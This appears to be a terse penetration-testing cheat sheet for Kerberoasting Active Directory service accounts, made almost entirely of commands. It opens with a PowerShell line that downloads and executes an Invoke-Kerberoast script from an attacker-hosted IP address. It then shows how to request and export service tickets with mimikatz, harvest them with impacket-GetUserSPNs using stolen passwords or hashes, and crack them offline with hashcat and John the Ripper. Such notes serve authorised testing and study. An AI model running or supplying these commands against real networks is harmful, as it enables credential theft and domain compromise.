Copy powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.132:8080/invoke-kerberoast.ps1'); Invoke-Kerberoast -Domain 'domain.com' | fl"
Import-Module .\invoke - kerberoast.ps1 (or . .\invoke - kerberoast.ps1)
Invoke-Kerberoast - Domain 'domain.com' | fl
( - Server 'dc01.domain.com' )
#with creds
$SecPassword = ConvertTo-SecureString 'Pass' - AsPlainText - Force
$Cred = New-Object System.Management.Automation.PSCredential( 'doamin\user.x' , $SecPassword)
Invoke-Kerberoast - Credential $Cred - Verbose | fl SPN e.g. MSSQLSvc/xor-app23.xor.com:1433 HTTP/CorpWebServer.corp.com
Copy Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '{SPN}'
klist
or
sekurlsa::tickets Dump .kirbi for kerberoast (no need admin)
Copy .\mimikatz.exe "kerberos::list /export" "exit" With domain user pwd / hash, dump for kerberoash from kali
Copy
proxychains impacket-GetUserSPNs domain.local/user:"pwd" -dc-ip 10.10.10.10 -request
proxychains impacket-GetUserSPNs domain.local/user -hashes lm:nt -dc-ip 10.10.10.10 -request kerberoast to crack service ticket cleartext pwd
Copy kirbi2john exported.kirbi > johnkirbi.txt
hashcat -m 13100 --force johnkirbi.txt /usr/share/wordlists/rockyou.txt
john /usr/share/wordlists/rockyou.txt johnkirbi.txt --format=krb5tgs
Copy tgsrepcrack /usr/share/wordlists/rockyou.txt xxxx.kirbi 
